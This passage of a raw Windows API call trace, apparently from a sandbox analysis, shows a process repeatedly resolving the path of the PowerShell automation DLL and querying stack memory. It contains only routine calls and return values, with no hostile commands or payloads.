lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.359] GetLastError () returned 0x0 [0145.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.359] GetLastError () returned 0x0 [0145.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.359] GetLastError () returned 0x0 [0145.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.359] GetLastError () returned 0x0 [0145.360] VirtualQuery (in: lpAddress=0x24cc04, lpBuffer=0x24dc04, dwLength=0x1c | out: lpBuffer=0x24dc04*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.361] VirtualQuery (in: lpAddress=0x24cc40, lpBuffer=0x24dc40, dwLength=0x1c | out: lpBuffer=0x24dc40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.361] GetLastError () returned 0x0 [0145.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.361] GetLastError () returned 0x0 [0145.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.361] GetLastError () returned 0x0 [0145.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.361] GetLastError () returned 0x0 [0145.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.361] GetLastError () returned 0x0 [0145.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.361] GetLastError () returned 0x0 [0145.361] VirtualQuery (in: lpAddress=0x24cf70, lpBuffer=0x24df70, dwLength=0x1c | out: lpBuffer=0x24df70*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.362] GetLastError () returned 0x0 [0145.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.362] GetLastError () returned 0x0 [0145.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.362] GetLastError () returned 0x0 [0145.362] VirtualQuery (in: lpAddress=0x24cf70, lpBuffer=0x24df70, dwLength=0x1c | out: lpBuffer=0x24df70*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.362] GetLastError () returned 0x0 [0145.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.362] GetLastError () returned 0x0 [0145.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.362] GetLastError () returned 0x0 [0145.362] VirtualQuery (in: lpAddress=0x24cf70, lpBuffer=0x24df70, dwLength=0x1c | out: lpBuffer=0x24df70*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.363] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.363] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.364] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.364] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.364] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.364] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.364] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.364] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.365] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.365] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.366] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.366] VirtualQuery (in: lpAddress=0x24cdac, lpBuffer=0x24ddac, dwLength=0x1c | out: lpBuffer=0x24ddac*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.366] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.367] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.367] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.367] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.367] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xb0b4a788, Data2=0x3699, Data3=0x4f73, Data4=([0]=0xaa, [1]=0x6b, [2]=0xa, [3]=0xf8, [4]=0xdb, [5]=0xd9, [6]=0x9d, [7]=0x99))) returned 0x0 [0145.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.367] GetLastError () returned 0x0 [0145.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.367] GetLastError () returned 0x0 [0145.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.368] GetLastError () returned 0x0 [0145.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.369] GetLastError () returned 0x0 [0145.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.369] GetLastError () returned 0x0 [0145.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.369] GetLastError () returned 0x0 [0145.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.369] GetLastError () returned 0x0 [0145.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.369] GetLastError () returned 0x0 [0145.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.369] GetLastError () returned 0x0 [0145.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.369] GetLastError () returned 0x0 [0145.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.369] GetLastError () returned 0x0 [0145.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.369] GetLastError () returned 0x0 [0145.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.369] GetLastError () returned 0x0 [0145.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.370] GetLastError () returned 0x0 [0145.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.370] GetLastError () returned 0x0 [0145.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.370] GetLastError () returned 0x0 [0145.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.370] GetLastError () returned 0x0 [0145.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.370] GetLastError () returned 0x0 [0145.370] VirtualQuery (in: lpAddress=0x24cf70, lpBuffer=0x24df70, dwLength=0x1c | out: lpBuffer=0x24df70*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.370] GetLastError () returned 0x0 [0145.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.370] GetLastError () returned 0x0 [0145.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.370] GetLastError () returned 0x0 [0145.370] VirtualQuery (in: lpAddress=0x24cf70, lpBuffer=0x24df70, dwLength=0x1c | 